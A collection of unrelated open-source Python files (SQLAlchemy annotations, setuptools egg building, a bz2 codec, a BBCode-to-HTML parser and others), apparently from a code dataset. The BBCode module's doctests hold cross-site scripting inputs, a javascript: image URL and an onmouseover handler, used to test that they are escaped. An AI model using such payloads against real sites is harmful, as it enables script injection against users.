# sql/annotation.py # Copyright (C) 2005-2017 the SQLAlchemy authors and contributors # <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """The :class:`.Annotated` class and related routines; creates hash-equivalent copies of SQL constructs which contain context-specific markers and associations. """ from .. import util from . import operators class Annotated(object): """clones a ClauseElement and applies an 'annotations' dictionary. Unlike regular clones, this clone also mimics __hash__() and __cmp__() of the original element so that it takes its place in hashed collections. A reference to the original element is maintained, for the important reason of keeping its hash value current. When GC'ed, the hash value may be reused, causing conflicts. .. note:: The rationale for Annotated producing a brand new class, rather than placing the functionality directly within ClauseElement, is **performance**. The __hash__() method is absent on plain ClauseElement which leads to significantly reduced function call overhead, as the use of sets and dictionaries against ClauseElement objects is prevalent, but most are not "annotated". """ def __new__(cls, *args): if not args: # clone constructor return object.__new__(cls) else: element, values = args # pull appropriate subclass from registry of annotated # classes try: cls = annotated_classes[element.__class__] except KeyError: cls = _new_annotation_type(element.__class__, cls) return object.__new__(cls) def __init__(self, element, values): self.__dict__ = element.__dict__.copy() self.__element = element self._annotations = values self._hash = hash(element) def _annotate(self, values): _values = self._annotations.copy() _values.update(values) return self._with_annotations(_values) def _with_annotations(self, values): clone = self.__class__.__new__(self.__class__) clone.__dict__ = self.__dict__.copy() clone._annotations = values return clone def _deannotate(self, values=None, clone=True): if values is None: return self.__element else: _values = self._annotations.copy() for v in values: _values.pop(v, None) return self._with_annotations(_values) def _compiler_dispatch(self, visitor, **kw): return self.__element.__class__._compiler_dispatch( self, visitor, **kw) @property def _constructor(self): return self.__element._constructor def _clone(self): clone = self.__element._clone() if clone is self.__element: # detect immutable, don't change anything return self else: # update the clone with any changes that have occurred # to this object's __dict__. clone.__dict__.update(self.__dict__) return self.__class__(clone, self._annotations) def __hash__(self): return self._hash def __eq__(self, other): if isinstance(self.__element, operators.ColumnOperators): return self.__element.__class__.__eq__(self, other) else: return hash(other) == hash(self) # hard-generate Annotated subclasses. this technique # is used instead of on-the-fly types (i.e. type.__new__()) # so that the resulting objects are pickleable. annotated_classes = {} def _deep_annotate(element, annotations, exclude=None): """Deep copy the given ClauseElement, annotating each element with the given annotations dictionary. Elements within the exclude collection will be cloned but not annotated. """ def clone(elem): if exclude and \ hasattr(elem, 'proxy_set') and \ elem.proxy_set.intersection(exclude): newelem = elem._clone() elif annotations != elem._annotations: newelem = elem._annotate(annotations) else: newelem = elem newelem._copy_internals(clone=clone) return newelem if element is not None: element = clone(element) return element def _deep_deannotate(element, values=None): """Deep copy the given element, removing annotations.""" cloned = util.column_dict() def clone(elem): # if a values dict is given, # the elem must be cloned each time it appears, # as there may be different annotations in source # elements that are remaining. if totally # removing all annotations, can assume the same # slate... if values or elem not in cloned: newelem = elem._deannotate(values=values, clone=True) newelem._copy_internals(clone=clone) if not values: cloned[elem] = newelem return newelem else: return cloned[elem] if element is not None: element = clone(element) return element def _shallow_annotate(element, annotations): """Annotate the given ClauseElement and copy its internals so that internal objects refer to the new annotated object. Basically used to apply a "dont traverse" annotation to a selectable, without digging throughout the whole structure wasting time. """ element = element._annotate(annotations) element._copy_internals() return element def _new_annotation_type(cls, base_cls): if issubclass(cls, Annotated): return cls elif cls in annotated_classes: return annotated_classes[cls] for super_ in cls.__mro__: # check if an Annotated subclass more specific than # the given base_cls is already registered, such # as AnnotatedColumnElement. if super_ in annotated_classes: base_cls = annotated_classes[super_] break annotated_classes[cls] = anno_cls = type( "Annotated%s" % cls.__name__, (base_cls, cls), {}) globals()["Annotated%s" % cls.__name__] = anno_cls return anno_cls def _prepare_annotations(target_hierarchy, base_cls): stack = [target_hierarchy] while stack: cls = stack.pop() stack.extend(cls.__subclasses__()) _new_annotation_type(cls, base_cls)
havard024/prego
refs/heads/master
venv/lib/python2.7/site-packages/setuptools/command/bdist_egg.py
286
"""setuptools.command.bdist_egg Build .egg distributions""" # This module should be kept compatible with Python 2.3 import sys, os, marshal from setuptools import Command from distutils.dir_util import remove_tree, mkpath try: # Python 2.7 or >=3.2 from sysconfig import get_path, get_python_version def _get_purelib(): return get_path("purelib") except ImportError: from distutils.sysconfig import get_python_lib, get_python_version def _get_purelib(): return get_python_lib(False) from distutils import log from distutils.errors import DistutilsSetupError from pkg_resources import get_build_platform, Distribution, ensure_directory from pkg_resources import EntryPoint from types import CodeType from setuptools.compat import basestring, next from setuptools.extension import Library def strip_module(filename): if '.' in filename: filename = os.path.splitext(filename)[0] if filename.endswith('module'): filename = filename[:-6] return filename def write_stub(resource, pyfile): f = open(pyfile,'w') f.write('\n'.join([ "def __bootstrap__():", " global __bootstrap__, __loader__, __file__", " import sys, pkg_resources, imp", " __file__ = pkg_resources.resource_filename(__name__,%r)" % resource, " __loader__ = None; del __bootstrap__, __loader__", " imp.load_dynamic(__name__,__file__)", "__bootstrap__()", "" # terminal \n ])) f.close() # stub __init__.py for packages distributed without one NS_PKG_STUB = '__import__("pkg_resources").declare_namespace(__name__)' class bdist_egg(Command): description = "create an \"egg\" distribution" user_options = [ ('bdist-dir=', 'b', "temporary directory for creating the distribution"), ('plat-name=', 'p', "platform name to embed in generated filenames " "(default: %s)" % get_build_platform()), ('exclude-source-files', None, "remove all .py files from the generated egg"), ('keep-temp', 'k', "keep the pseudo-installation tree around after " + "creating the distribution archive"), ('dist-dir=', 'd', "directory to put final built distributions in"), ('skip-build', None, "skip rebuilding everything (for testing/debugging)"), ] boolean_options = [ 'keep-temp', 'skip-build', 'exclude-source-files' ] def initialize_options (self): self.bdist_dir = None self.plat_name = None self.keep_temp = 0 self.dist_dir = None self.skip_build = 0 self.egg_output = None self.exclude_source_files = None def finalize_options(self): ei_cmd = self.ei_cmd = self.get_finalized_command("egg_info") self.egg_info = ei_cmd.egg_info if self.bdist_dir is None: bdist_base = self.get_finalized_command('bdist').bdist_base self.bdist_dir = os.path.join(bdist_base, 'egg') if self.plat_name is None: self.plat_name = get_build_platform() self.set_undefined_options('bdist',('dist_dir', 'dist_dir')) if self.egg_output is None: # Compute filename of the output egg basename = Distribution( None, None, ei_cmd.egg_name, ei_cmd.egg_version, get_python_version(), self.distribution.has_ext_modules() and self.plat_name ).egg_name() self.egg_output = os.path.join(self.dist_dir, basename+'.egg') def do_install_data(self): # Hack for packages that install data to install's --install-lib self.get_finalized_command('install').install_lib = self.bdist_dir site_packages = os.path.normcase(os.path.realpath(_get_purelib())) old, self.distribution.data_files = self.distribution.data_files,[] for item in old: if isinstance(item,tuple) and len(item)==2: if os.path.isabs(item[0]): realpath = os.path.realpath(item[0]) normalized = os.path.normcase(realpath) if normalized==site_packages or normalized.startswith( site_packages+os.sep ): item = realpath[len(site_packages)+1:], item[1] # XXX else: raise ??? self.distribution.data_files.append(item) try: log.info("installing package data to %s" % self.bdist_dir) self.call_command('install_data', force=0, root=None) finally: self.distribution.data_files = old def get_outputs(self): return [self.egg_output] def call_command(self,cmdname,**kw): """Invoke reinitialized command `cmdname` with keyword args""" for dirname in INSTALL_DIRECTORY_ATTRS: kw.setdefault(dirname,self.bdist_dir) kw.setdefault('skip_build',self.skip_build) kw.setdefault('dry_run', self.dry_run) cmd = self.reinitialize_command(cmdname, **kw) self.run_command(cmdname) return cmd def run(self): # Generate metadata first self.run_command("egg_info") # We run install_lib before install_data, because some data hacks # pull their data path from the install_lib command. log.info("installing library code to %s" % self.bdist_dir) instcmd = self.get_finalized_command('install') old_root = instcmd.root; instcmd.root = None if self.distribution.has_c_libraries() and not self.skip_build: self.run_command('build_clib') cmd = self.call_command('install_lib', warn_dir=0) instcmd.root = old_root all_outputs, ext_outputs = self.get_ext_outputs() self.stubs = [] to_compile = [] for (p,ext_name) in enumerate(ext_outputs): filename,ext = os.path.splitext(ext_name) pyfile = os.path.join(self.bdist_dir, strip_module(filename)+'.py') self.stubs.append(pyfile) log.info("creating stub loader for %s" % ext_name) if not self.dry_run: write_stub(os.path.basename(ext_name), pyfile) to_compile.append(pyfile) ext_outputs[p] = ext_name.replace(os.sep,'/') to_compile.extend(self.make_init_files()) if to_compile: cmd.byte_compile(to_compile) if self.distribution.data_files: self.do_install_data() # Make the EGG-INFO directory archive_root = self.bdist_dir egg_info = os.path.join(archive_root,'EGG-INFO') self.mkpath(egg_info) if self.distribution.scripts: script_dir = os.path.join(egg_info, 'scripts') log.info("installing scripts to %s" % script_dir) self.call_command('install_scripts',install_dir=script_dir,no_ep=1) self.copy_metadata_to(egg_info) native_libs = os.path.join(egg_info, "native_libs.txt") if all_outputs: log.info("writing %s" % native_libs) if not self.dry_run: ensure_directory(native_libs) libs_file = open(native_libs, 'wt') libs_file.write('\n'.join(all_outputs)) libs_file.write('\n') libs_file.close() elif os.path.isfile(native_libs): log.info("removing %s" % native_libs) if not self.dry_run: os.unlink(native_libs) write_safety_flag( os.path.join(archive_root,'EGG-INFO'), self.zip_safe() ) if os.path.exists(os.path.join(self.egg_info,'depends.txt')): log.warn( "WARNING: 'depends.txt' will not be used by setuptools 0.6!\n" "Use the install_requires/extras_require setup() args instead." ) if self.exclude_source_files: self.zap_pyfiles() # Make the archive make_zipfile(self.egg_output, archive_root, verbose=self.verbose, dry_run=self.dry_run, mode=self.gen_header()) if not self.keep_temp: remove_tree(self.bdist_dir, dry_run=self.dry_run) # Add to 'Distribution.dist_files' so that the "upload" command works getattr(self.distribution,'dist_files',[]).append( ('bdist_egg',get_python_version(),self.egg_output)) def zap_pyfiles(self): log.info("Removing .py files from temporary directory") for base,dirs,files in walk_egg(self.bdist_dir): for name in files: if name.endswith('.py'): path = os.path.join(base,name) log.debug("Deleting %s", path) os.unlink(path) def zip_safe(self): safe = getattr(self.distribution,'zip_safe',None) if safe is not None: return safe log.warn("zip_safe flag not set; analyzing archive contents...") return analyze_egg(self.bdist_dir, self.stubs) def make_init_files(self): """Create missing package __init__ files""" init_files = [] for base,dirs,files in walk_egg(self.bdist_dir): if base==self.bdist_dir: # don't put an __init__ in the root continue for name in files: if name.endswith('.py'): if '__init__.py' not in files: pkg = base[len(self.bdist_dir)+1:].replace(os.sep,'.') if self.distribution.has_contents_for(pkg): log.warn("Creating missing __init__.py for %s",pkg) filename = os.path.join(base,'__init__.py') if not self.dry_run: f = open(filename,'w'); f.write(NS_PKG_STUB) f.close() init_files.append(filename) break else: # not a package, don't traverse to subdirectories dirs[:] = [] return init_files def gen_header(self): epm = EntryPoint.parse_map(self.distribution.entry_points or '') ep = epm.get('setuptools.installation',{}).get('eggsecutable') if ep is None: return 'w' # not an eggsecutable, do it the usual way. if not ep.attrs or ep.extras: raise DistutilsSetupError( "eggsecutable entry point (%r) cannot have 'extras' " "or refer to a module" % (ep,) ) pyver = sys.version[:3] pkg = ep.module_name full = '.'.join(ep.attrs) base = ep.attrs[0] basename = os.path.basename(self.egg_output) header = ( "#!/bin/sh\n" 'if [ `basename $0` = "%(basename)s" ]\n' 'then exec python%(pyver)s -c "' "import sys, os; sys.path.insert(0, os.path.abspath('$0')); " "from %(pkg)s import %(base)s; sys.exit(%(full)s())" '" "$@"\n' 'else\n' ' echo $0 is not the correct name for this egg file.\n' ' echo Please rename it back to %(basename)s and try again.\n' ' exec false\n' 'fi\n' ) % locals() if not self.dry_run: mkpath(os.path.dirname(self.egg_output), dry_run=self.dry_run) f = open(self.egg_output, 'w') f.write(header) f.close() return 'a' def copy_metadata_to(self, target_dir): "Copy metadata (egg info) to the target_dir" # normalize the path (so that a forward-slash in egg_info will # match using startswith below) norm_egg_info = os.path.normpath(self.egg_info) prefix = os.path.join(norm_egg_info,'') for path in self.ei_cmd.filelist.files: if path.startswith(prefix): target = os.path.join(target_dir, path[len(prefix):]) ensure_directory(target) self.copy_file(path, target) def get_ext_outputs(self): """Get a list of relative paths to C extensions in the output distro""" all_outputs = [] ext_outputs = [] paths = {self.bdist_dir:''} for base, dirs, files in os.walk(self.bdist_dir): for filename in files: if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS: all_outputs.append(paths[base]+filename) for filename in dirs: paths[os.path.join(base,filename)] = paths[base]+filename+'/' if self.distribution.has_ext_modules(): build_cmd = self.get_finalized_command('build_ext') for ext in build_cmd.extensions: if isinstance(ext,Library): continue fullname = build_cmd.get_ext_fullname(ext.name) filename = build_cmd.get_ext_filename(fullname) if not os.path.basename(filename).startswith('dl-'): if os.path.exists(os.path.join(self.bdist_dir,filename)): ext_outputs.append(filename) return all_outputs, ext_outputs NATIVE_EXTENSIONS = dict.fromkeys('.dll .so .dylib .pyd'.split()) def walk_egg(egg_dir): """Walk an unpacked egg's contents, skipping the metadata directory""" walker = os.walk(egg_dir) base,dirs,files = next(walker) if 'EGG-INFO' in dirs: dirs.remove('EGG-INFO') yield base,dirs,files for bdf in walker: yield bdf def analyze_egg(egg_dir, stubs): # check for existing flag in EGG-INFO for flag,fn in safety_flags.items(): if os.path.exists(os.path.join(egg_dir,'EGG-INFO',fn)): return flag if not can_scan(): return False safe = True for base, dirs, files in walk_egg(egg_dir): for name in files: if name.endswith('.py') or name.endswith('.pyw'): continue elif name.endswith('.pyc') or name.endswith('.pyo'): # always scan, even if we already know we're not safe safe = scan_module(egg_dir, base, name, stubs) and safe return safe def write_safety_flag(egg_dir, safe): # Write or remove zip safety flag file(s) for flag,fn in safety_flags.items(): fn = os.path.join(egg_dir, fn) if os.path.exists(fn): if safe is None or bool(safe) != flag: os.unlink(fn) elif safe is not None and bool(safe)==flag: f=open(fn,'wt'); f.write('\n'); f.close() safety_flags = { True: 'zip-safe', False: 'not-zip-safe', } def scan_module(egg_dir, base, name, stubs): """Check whether module possibly uses unsafe-for-zipfile stuff""" filename = os.path.join(base,name) if filename[:-1] in stubs: return True # Extension module pkg = base[len(egg_dir)+1:].replace(os.sep,'.') module = pkg+(pkg and '.' or '')+os.path.splitext(name)[0] if sys.version_info < (3, 3): skip = 8 # skip magic & date else: skip = 12 # skip magic & date & file size f = open(filename,'rb'); f.read(skip) code = marshal.load(f); f.close() safe = True symbols = dict.fromkeys(iter_symbols(code)) for bad in ['__file__', '__path__']: if bad in symbols: log.warn("%s: module references %s", module, bad) safe = False if 'inspect' in symbols: for bad in [ 'getsource', 'getabsfile', 'getsourcefile', 'getfile' 'getsourcelines', 'findsource', 'getcomments', 'getframeinfo', 'getinnerframes', 'getouterframes', 'stack', 'trace' ]: if bad in symbols: log.warn("%s: module MAY be using inspect.%s", module, bad) safe = False if '__name__' in symbols and '__main__' in symbols and '.' not in module: if sys.version[:3]=="2.4": # -m works w/zipfiles in 2.5 log.warn("%s: top-level module may be 'python -m' script", module) safe = False return safe def iter_symbols(code): """Yield names and strings used by `code` and its nested code objects""" for name in code.co_names: yield name for const in code.co_consts: if isinstance(const,basestring): yield const elif isinstance(const,CodeType): for name in iter_symbols(const): yield name def can_scan(): if not sys.platform.startswith('java') and sys.platform != 'cli': # CPython, PyPy, etc. return True log.warn("Unable to analyze compiled code on this platform.") log.warn("Please ask the author to include a 'zip_safe'" " setting (either True or False) in the package's setup.py") # Attribute names of options for commands that might need to be convinced to # install to the egg build directory INSTALL_DIRECTORY_ATTRS = [ 'install_lib', 'install_dir', 'install_data', 'install_base' ] def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=None, mode='w' ): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir)+1:] if not dry_run: z.write(path, p) log.debug("adding '%s'" % p) if compress is None: compress = (sys.version>="2.4") # avoid 2.3 zipimport bug when 64 bits compression = [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED][bool(compress)] if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename #
kenshay/ImageScript
refs/heads/master
ProgramData/SystemFiles/Python/Lib/encodings/bz2_codec.py
58
""" Python 'bz2_codec' Codec - bz2 compression encoding Unlike most of the other codecs which target Unicode, this codec will return Python string objects for both encode and decode. Adapted by Raymond Hettinger from zlib_codec.py which was written by Marc-Andre Lemburg (mal@lemburg.com). """ import codecs import bz2 # this codec needs the optional bz2 module ! ### Codec APIs def bz2_encode(input,errors='strict'): """ Encodes the object input and returns a tuple (output object, length consumed). errors defines the error handling to apply. It defaults to 'strict' handling which is the only currently supported error handling for this codec. """ assert errors == 'strict' output = bz2.compress(input) return (output, len(input)) def bz2_decode(input,errors='strict'): """ Decodes the object input and returns a tuple (output object, length consumed). input must be an object which provides the bf_getreadbuf buffer slot. Python strings, buffer objects and memory mapped files are examples of objects providing this slot. errors defines the error handling to apply. It defaults to 'strict' handling which is the only currently supported error handling for this codec. """ assert errors == 'strict' output = bz2.decompress(input) return (output, len(input)) class Codec(codecs.Codec): def encode(self, input, errors='strict'): return bz2_encode(input, errors) def decode(self, input, errors='strict'): return bz2_decode(input, errors) class IncrementalEncoder(codecs.IncrementalEncoder): def __init__(self, errors='strict'): assert errors == 'strict' self.errors = errors self.compressobj = bz2.BZ2Compressor() def encode(self, input, final=False): if final: c = self.compressobj.compress(input) return c + self.compressobj.flush() else: return self.compressobj.compress(input) def reset(self): self.compressobj = bz2.BZ2Compressor() class IncrementalDecoder(codecs.IncrementalDecoder): def __init__(self, errors='strict'): assert errors == 'strict' self.errors = errors self.decompressobj = bz2.BZ2Decompressor() def decode(self, input, final=False): try: return self.decompressobj.decompress(input) except EOFError: return '' def reset(self): self.decompressobj = bz2.BZ2Decompressor() class StreamWriter(Codec,codecs.StreamWriter): pass class StreamReader(Codec,codecs.StreamReader): pass ### encodings module API def getregentry(): return codecs.CodecInfo( name="bz2", encode=bz2_encode, decode=bz2_decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamwriter=StreamWriter, streamreader=StreamReader, _is_text_encoding=False, )
lukeiwanski/tensorflow
refs/heads/master
tensorflow/python/framework/op_def_registry.py
196
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Global registry for OpDefs.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.core.framework import op_def_pb2 _registered_ops = {} def register_op_list(op_list): """Register all the ops in an op_def_pb2.OpList.""" if not isinstance(op_list, op_def_pb2.OpList): raise TypeError("%s is %s, not an op_def_pb2.OpList" % (op_list, type(op_list))) for op_def in op_list.op: if op_def.name in _registered_ops: assert _registered_ops[op_def.name] == op_def else: _registered_ops[op_def.name] = op_def def get_registered_ops(): """Returns a dictionary mapping names to OpDefs.""" return _registered_ops
SBillion/aegroupware
refs/heads/master
modules/djangobb_forum/markups/bbmarkup.py
2
import re from django.conf import settings from django.utils.html import escape from django.template.defaultfilters import linebreaksbr from django.utils.safestring import mark_safe __all__ = ('BBCODE_RULES', 'bbcode') #regexp for url validation from django URLField + added ftp:// and allowing spaces around URL_RE = r'\s*((ftp|https?)://(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|'\ 'localhost|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})(?::\d+)?(?:/?|[/?]\S+))\s*' #regexp for email from django + allowing spaces around EMAIL_RE = r"""\s*(([-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*|^"""\ """([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*")"""\ """@(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?)\s*""" def code_parser(matchobj): """ Escaping bbcode and html tags between [code] tags. """ value = matchobj.group(1) value = value.replace('[', '&#91;') value = value.replace(']', '&#93;') value = value.replace('<br />', '\n') return "<pre><code>%s</code></pre>" % value """ BBcode rule format: 'pattern' and 'repl'' - params for re.sub(); 'repl' can be function 'sortkey' - used to sort rules from highest to lowest; default value: 0 'nested' - show how many time tag can be nested to itself; only for [quote] now """ BBCODE_RULES = [ {'pattern': r'\[code\](.*?)\[/code\]', 'repl': code_parser, 'sortkey': 100}, {'pattern': r'\[url\]%s\[/url\]' % URL_RE, 'repl': r'<a href="\1">\1</a>'}, {'pattern': r'\[url=%s\](.*?)\[/url\]' % URL_RE, 'repl': r'<a href="\1">\3</a>'}, {'pattern': r'\[link\]%s\[/link\]' % URL_RE, 'repl': r'<a href="\1">\1</a>'}, {'pattern': r'\[link=%s\](.*?)\[/link\]' % URL_RE, 'repl': r'<a href="\1">\3</a>'}, {'pattern': r'\[email\]%s\[/email\]' % EMAIL_RE, 'repl': r'<a href="mailto:\1">\1</a>'}, {'pattern': r'\[email=%s\](.*?)\[/email\]' % EMAIL_RE, 'repl': r'<a href="mailto:\1">\5</a>'}, {'pattern': r'\[img\]%s\[/img\]' % URL_RE, 'repl': r'<img src="\1">'}, {'pattern': r'\[img=%s\](.*?)\[/img\]' % URL_RE, 'repl': r'<img src="\1" alt="\3">'}, {'pattern': r'\[color=([a-zA-Z]*|\#?[0-9a-fA-F]{6})\](.*?)\[/color\]', 'repl': r'<span style="color:\1">\2</span>'}, {'pattern': r'\[b\](.*?)\[/b\]', 'repl': r'<strong>\1</strong>'}, {'pattern': r'\[i\](.*?)\[/i\]', 'repl': r'<em>\1</em>'}, {'pattern': r'\[u\](.*?)\[/u\]', 'repl': r'<u>\1</u>'}, {'pattern': r'\[s\](.*?)\[/s\]', 'repl': r'<strike>\1</strike>'}, {'pattern': r'\[quote\](.*?)\[/quote\]', 'repl': r'<blockquote>\1</blockquote>', 'nested': 5}, {'pattern': r'\[quote=(.*?)\](.*?)\[/quote\]', 'repl': r'<blockquote><em>\1</em> <br /> \2</blockquote>', 'nested': 5}, {'pattern': r'\[center\](.*?)\[/center\]', 'repl': r'<div style="text-align: center;">\1</div>'}, {'pattern': r'\[big\](.*?)\[/big\]', 'repl': r'<big>\1</big>'}, {'pattern': r'\[small\](.*?)\[/small\]', 'repl': r'<small>\1</small>'}, {'pattern': r'\[list\](.*?)\[/list\]', 'repl': r'<ul>\1</ul>'}, {'pattern': r'\[list\=(\d+)\](.*?)\[/list\]', 'repl': r'<ol start="\1">\2</ol>'}, {'pattern': r'\[\*\](.*?)<br./>', 'repl': r'<li>\1</li>'}, {'pattern': r'\[br\]', 'repl': r'<br />'}, ] BBCODE_RULES += getattr(settings, 'BBMARKUP_EXTRA_RULES', []) BBCODE_RULES.sort(key=lambda r: r.get('sortkey', 0), reverse=True) BBCODE_RULES_COMPILED = [] for bbset in (getattr(settings, 'BBMARKUP_CUSTOM_RULES', []) or BBCODE_RULES): bbset['pattern'] = re.compile(bbset['pattern'], re.DOTALL | re.IGNORECASE) bbset.setdefault('sortkey', 0) bbset.setdefault('nested', 0) BBCODE_RULES_COMPILED.append(bbset) def bbcode(value, code_parser=code_parser): """ >>> data = '[code]print "Lorem [b]imsum[b]"[/code]' >>> bbcode(data) u'<pre><code>print &quot;Lorem &#91;b&#93;imsum&#91;b&#93;&quot;</code></pre>' >>> bbcode('[i]Lorem[/i] \\n [s]imsum[/s]') u'<em>Lorem</em> <br /> <strike>imsum</strike>' >>> bbcode('[list] [*] 1\\n [*]2\\n [*] 3\\n[/list]') u'<ul> <li> 1</li> <li>2</li> <li> 3</li></ul>' >>> bbcode('[list=2] [*] a\\n [*]b\\n [*] c\\n[/list]') u'<ol start="2"> <li> a</li> <li>b</li> <li> c</li></ol>' >>> bbcode("[code]print 123\\nprint '<br/>'[/code]") u'<pre><code>print 123\\nprint &#39;&lt;br/&gt;&#39;</code></pre>' >>> bbcode('[quote=test user]Test quote text[/quote]') u'<blockquote><em>test user</em> <br /> Test quote text</blockquote>' >>> bbcode("[quote]Lorem [quote=sl]imsum[/quote] blabla [/quote]") u'<blockquote>Lorem <blockquote><em>sl</em> <br /> imsum</blockquote> blabla </blockquote>' >>> bbcode('[color=red]Lorem[/color]') u'<span style="color:red">Lorem</span>' >>> bbcode('[color=#FAaF12]Lorem[/color]') u'<span style="color:#FAaF12">Lorem</span>' >>> bbcode('[color=#FAaF121]Lorem[/color]') u'[color=#FAaF121]Lorem[/color]' >>> bbcode('[url]http://slav0nic.org.ua[/url]]') u'<a href="http://slav0nic.org.ua">http://slav0nic.org.ua</a>]' >>> bbcode('[url]http://slav0nic.org.ua[/url]') u'<a href="http://slav0nic.org.ua">http://slav0nic.org.ua</a>' >>> bbcode('[url] ftp://slav0nic.org.ua/test [/url]') u'<a href="ftp://slav0nic.org.ua/test">ftp://slav0nic.org.ua/test</a>' >>> bbcode('[url] http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1[/url]') u'<a href="http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1">http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1</a>' >>> bbcode('[link=http://test.com/] test [/link]') u'<a href="http://test.com/"> test </a>' >>> bbcode('[url= http://test.com/ ] test [/url]') u'<a href="http://test.com/"> test </a>' >>> bbcode('[url= http://test.com/][/url]') u'<a href="http://test.com/"></a>' >>> bbcode('[img] https://slav0nic.org.ua:80/test/logo.png [/img]') u'<img src="https://slav0nic.org.ua:80/test/logo.png">' >>> bbcode('[img]javascript:alert("XSS");[/img]') u'[img]javascript:alert("XSS");[/img]' >>> bbcode('''[email]blabla@test.com" onmouseover="alert('Hacked');[/email]''') u'[email]blabla@test.com&quot; onmouseover=&quot;alert(&#39;Hacked&#39;);[/email]' >>> bbcode('[email] blabla@test.com [/email]') u'<a href="mailto:blabla@test.com">blabla@test.com</a>' >>> bbcode('[email]blabla@test.com[/email]') u'<a href="mailto:blabla@test.com">blabla@test.com</a>' >>> bbcode('[email= blabla@test.com ] Blablasha :][/email]') u'<a href="mailto:blabla@test.com"> Blablasha :]</a>' """ value = escape(value) value = linebreaksbr(value) for bbset in BBCODE_RULES_COMPILED: for _ in xrange(bbset['nested'] + 1): value = bbset['pattern'].sub(bbset['repl'], value) return mark_safe(value)
colinmorris/char-rbm
refs/heads/master
Utils.py
1
import numpy as np import time import logging from collections import Counter from ShortTextCodec import NonEncodableTextException from sklearn.preprocessing import OneHotEncoder DEBUG_TIMING = False # Taken from StackOverflow def timeit(f): if not DEBUG_TIMING: return f def timed(*args, **kw): ts = time.time() result = f(*args, **kw) te = time.time() print 'func:%r took: %2.4f sec' % \ (f.__name__, te - ts) return result return timed def vectors_from_txtfile(fname, codec, limit=-1, mutagen=None): f = open(fname) skipped = Counter() vecs = [] for line in f: line = line.strip() try: vecs.append(codec.encode(line, mutagen=mutagen)) if len(vecs) == limit: break except NonEncodableTextException as e: # Too long, or illegal characters skipped[e.reason] += 1 logging.debug("Gathered {} vectors. Skipped {} ({})".format(len(vecs), sum(skipped.values()), dict(skipped))) vecs = np.asarray(vecs) # TODO: Why default to dtype=float? Seems wasteful? Maybe it doesn't really matter. Actually, docs here seem inconsistent? Constructor docs say default float. transform docs say int. Should file a bug on sklearn. return OneHotEncoder(len(codec.alphabet)).fit_transform(vecs) # Adapted from sklearn.utils.extmath.softmax def softmax(X, copy=True): if copy: X = np.copy(X) X_shape = X.shape a, b, c = X_shape # This will cause overflow when large values are exponentiated. # Hence the largest value in each row is subtracted from each data max_prob = np.max(X, axis=2).reshape((X.shape[0], X.shape[1], 1)) X -= max_prob np.exp(X, X) sum_prob = np.sum(X, axis=2).reshape((X.shape[0], X.shape[1], 1)) X /= sum_prob return X def softmax_and_sample(X, copy=True): """ Given an array of 2-d arrays, each having shape (M, N) representing M softmax units with N possible values each, return an array of the same shape where each N-dimensional inner array has a 1 at one index, and zero everywhere else. The 1 is assigned according to the corresponding softmax probabilities (i.e. np.exp(X) / np.sum(np.exp(X)) ) Parameters ---------- X: array-like, shape (n_samples, M, N), dtype=float Argument to the logistic function copy: bool, optional Copy X or not. Returns ------- out: array of 0,1, shape (n_samples, M, N) Softmax function evaluated at every point in x and sampled """ a,b,c = X.shape X_shape = X.shape X = softmax(X, copy) # We've got our probabilities, now sample from them thresholds = np.random.rand(X.shape[0], X.shape[1], 1) cumsum = np.cumsum(X, axis=2, out=X) x, y, z = np.indices(cumsum.shape) # This relies on the fact that, if there are multiple instances of the max # value in an array, argmax returns the index of the first one to_select = np.argmax(cumsum > thresholds, axis=2).reshape(a, b, 1) bin_sample = np.zeros(X_shape) bin_sample[x, y, to_select] = 1 return bin_sample
TomTranter/OpenPNM
refs/heads/master
openpnm/phases/mixtures/DryAir.py
1
from openpnm.phases.mixtures import IdealGas, species import openpnm.models as mods from openpnm.utils import logging logger = logging.getLogger(__name__) class DryAir(IdealGas): r""" """ def __init__(self, network, **kwargs): super().__init__(network=network, components=[], **kwargs) N2 = species.gases.N2(network=network, name='N2_'+self.name) O2 = species.gases.O2(network=network, name='O2_'+self.name) self.set_component([O2, N2]) self.set_mole_fraction(component=N2, values=0.791) self.set_mole_fraction(component=O2, values=0.209) self.add_model(propname='pore.diffusivity.N2', model=mods.phases.mixtures.fuller_diffusivity) self.add_model(propname='pore.diffusivity.O2', model=mods.phases.mixtures.fuller_diffusivity)
jianghuaw/nova
refs/heads/master
nova/policies/instance_usage_audit_log.py
6
